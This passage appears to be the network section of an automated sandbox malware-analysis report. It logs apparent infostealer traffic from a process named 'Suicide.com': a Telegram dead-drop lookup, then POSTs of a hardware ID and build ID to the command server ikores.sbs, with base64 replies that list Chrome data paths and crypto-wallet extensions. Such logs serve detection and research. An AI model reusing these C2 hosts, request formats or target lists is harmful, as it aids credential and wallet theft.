                                                                                                                                                                                    Dec 6, 2024 09:42:42.898596048 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.898617983 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.898632050 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.898708105 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.898830891 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.898845911 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.898885012 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.898891926 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.898929119 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.898940086 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.898964882 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.898983955 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.898984909 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.898992062 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899002075 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899005890 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899040937 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899058104 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899101019 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899116993 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899125099 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899127960 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899139881 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899144888 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899158001 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899164915 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899179935 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899188995 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899203062 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899210930 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899234056 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899363995 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899389982 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899398088 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899405956 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899513006 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899528980 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899610996 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899626970 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899646044 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899724007 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899744987 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.899758101 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.941694021 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.941761971 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.942018986 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.942054987 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.942198038 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.970314980 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.970335007 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.970484018 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.970536947 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.970644951 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.970665932 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.970681906 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.970694065 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.970707893 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.970724106 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:42.970740080 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.970746994 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.970767975 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.970776081 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.970787048 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.970833063 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.970849991 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.970856905 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.970865965 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:42.970880985 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:43.001672983 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:43.001785040 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:43.001806974 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:43.001888037 CET49915443192.168.2.45.75.212.196
                                                                                                                                                                                    Dec 6, 2024 09:42:43.001902103 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:43.002053976 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:43.002470016 CET443499155.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:43.488370895 CET443499215.75.212.196192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:43.488420963 CET49921443192.168.2.45.75.212.196
                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    Dec 6, 2024 09:40:42.165987968 CET6256453192.168.2.41.1.1.1
                                                                                                                                                                                    Dec 6, 2024 09:40:42.407829046 CET53625641.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:41:58.412456036 CET6257653192.168.2.41.1.1.1
                                                                                                                                                                                    Dec 6, 2024 09:41:58.550209999 CET53625761.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:00.516733885 CET5342353192.168.2.41.1.1.1
                                                                                                                                                                                    Dec 6, 2024 09:42:00.833420038 CET53534231.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:16.755146980 CET53527981.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:16.795762062 CET53540691.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:16.981347084 CET5827853192.168.2.41.1.1.1
                                                                                                                                                                                    Dec 6, 2024 09:42:16.981647968 CET4943053192.168.2.41.1.1.1
                                                                                                                                                                                    Dec 6, 2024 09:42:17.118897915 CET53582781.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:17.118931055 CET53494301.1.1.1192.168.2.4
                                                                                                                                                                                    Dec 6, 2024 09:42:19.552911043 CET53515261.1.1.1192.168.2.4
                                                                                                                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                    Dec 6, 2024 09:42:16.894081116 CET192.168.2.41.1.1.1c233(Port unreachable)Destination Unreachable
                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                    Dec 6, 2024 09:40:42.165987968 CET192.168.2.41.1.1.10xee8dStandard query (0)LsPLJakEeBsUGsRzAQLUPOMOxfXyb.LsPLJakEeBsUGsRzAQLUPOMOxfXybA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 6, 2024 09:41:58.412456036 CET192.168.2.41.1.1.10x83Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 6, 2024 09:42:00.516733885 CET192.168.2.41.1.1.10x39c6Standard query (0)ikores.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 6, 2024 09:42:16.981347084 CET192.168.2.41.1.1.10x52Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 6, 2024 09:42:16.981647968 CET192.168.2.41.1.1.10x7c58Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                    Dec 6, 2024 09:40:42.407829046 CET1.1.1.1192.168.2.40xee8dName error (3)LsPLJakEeBsUGsRzAQLUPOMOxfXyb.LsPLJakEeBsUGsRzAQLUPOMOxfXybnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 6, 2024 09:41:58.550209999 CET1.1.1.1192.168.2.40x83No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 6, 2024 09:42:00.833420038 CET1.1.1.1192.168.2.40x39c6No error (0)ikores.sbs5.75.212.196A (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 6, 2024 09:42:17.118897915 CET1.1.1.1192.168.2.40x52No error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 6, 2024 09:42:17.118931055 CET1.1.1.1192.168.2.40x7c58No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                    • t.me
                                                                                                                                                                                    • ikores.sbs
                                                                                                                                                                                    • www.google.com
                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    0192.168.2.449784149.154.167.994437804C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-06 08:42:00 UTC85OUTGET /m3wm0w HTTP/1.1
                                                                                                                                                                                    Host: t.me
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-06 08:42:00 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                                    Date: Fri, 06 Dec 2024 08:42:00 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Content-Length: 12295
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Set-Cookie: stel_ssid=a387849f6c40fb8951_13632452722716539965; expires=Sat, 07 Dec 2024 08:42:00 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Cache-control: no-store
                                                                                                                                                                                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                    Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                    2024-12-06 08:42:00 UTC12295INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6d 33 77 6d 30 77 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @m3wm0w</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    1192.168.2.4497905.75.212.1964437804C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-06 08:42:02 UTC225OUTGET / HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                    Host: ikores.sbs
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-06 08:42:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Fri, 06 Dec 2024 08:42:03 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-06 08:42:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    2192.168.2.4497965.75.212.1964437804C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-06 08:42:04 UTC317OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----7Q9R9ZCTRI5F37GVSJ5X
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                    Host: ikores.sbs
                                                                                                                                                                                    Content-Length: 256
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-06 08:42:04 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 37 51 39 52 39 5a 43 54 52 49 35 46 33 37 47 56 53 4a 35 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 43 45 38 44 45 33 33 38 46 45 30 31 36 37 31 32 32 37 33 30 34 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 37 51 39 52 39 5a 43 54 52 49 35 46 33 37 47 56 53 4a 35 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 37 51 39 52 39 5a 43 54 52 49 35 46 33 37 47 56 53 4a 35 58 2d 2d 0d
                                                                                                                                                                                    Data Ascii: ------7Q9R9ZCTRI5F37GVSJ5XContent-Disposition: form-data; name="hwid"5CE8DE338FE01671227304-a33c7340-61ca------7Q9R9ZCTRI5F37GVSJ5XContent-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------7Q9R9ZCTRI5F37GVSJ5X--
                                                                                                                                                                                    2024-12-06 08:42:05 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Fri, 06 Dec 2024 08:42:05 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-06 08:42:05 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 65 66 37 30 65 64 36 30 39 34 36 34 32 35 35 62 66 66 33 30 66 66 65 31 63 37 64 64 65 31 32 35 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 3a1|1|1|1|ef70ed609464255bff30ffe1c7dde125|1|0|1|1|0|50000|00


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    3192.168.2.4498025.75.212.1964437804C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-06 08:42:07 UTC317OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----DB1V3WTJW4E37Q1VKX4W
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                    Host: ikores.sbs
                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-06 08:42:07 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 31 56 33 57 54 4a 57 34 45 33 37 51 31 56 4b 58 34 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 37 30 65 64 36 30 39 34 36 34 32 35 35 62 66 66 33 30 66 66 65 31 63 37 64 64 65 31 32 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 31 56 33 57 54 4a 57 34 45 33 37 51 31 56 4b 58 34 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 44 42 31 56 33 57 54 4a 57 34 45 33 37 51 31 56 4b 58 34 57 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------DB1V3WTJW4E37Q1VKX4WContent-Disposition: form-data; name="token"ef70ed609464255bff30ffe1c7dde125------DB1V3WTJW4E37Q1VKX4WContent-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------DB1V3WTJW4E37Q1VKX4WCont
                                                                                                                                                                                    2024-12-06 08:42:08 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Fri, 06 Dec 2024 08:42:07 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-06 08:42:08 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                    Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    4192.168.2.4498085.75.212.1964437804C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-06 08:42:09 UTC317OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----UKNYC2VKNGV37Q9R9R9H
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                    Host: ikores.sbs
                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-06 08:42:09 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 55 4b 4e 59 43 32 56 4b 4e 47 56 33 37 51 39 52 39 52 39 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 37 30 65 64 36 30 39 34 36 34 32 35 35 62 66 66 33 30 66 66 65 31 63 37 64 64 65 31 32 35 0d 0a 2d 2d 2d 2d 2d 2d 55 4b 4e 59 43 32 56 4b 4e 47 56 33 37 51 39 52 39 52 39 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 55 4b 4e 59 43 32 56 4b 4e 47 56 33 37 51 39 52 39 52 39 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------UKNYC2VKNGV37Q9R9R9HContent-Disposition: form-data; name="token"ef70ed609464255bff30ffe1c7dde125------UKNYC2VKNGV37Q9R9R9HContent-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------UKNYC2VKNGV37Q9R9R9HCont
                                                                                                                                                                                    2024-12-06 08:42:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Fri, 06 Dec 2024 08:42:10 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-06 08:42:10 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                    Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    5192.168.2.4498145.75.212.1964437804C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-06 08:42:11 UTC317OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----4OPHDT2D26F37YM7GV3E
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                    Host: ikores.sbs
                                                                                                                                                                                    Content-Length: 332
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
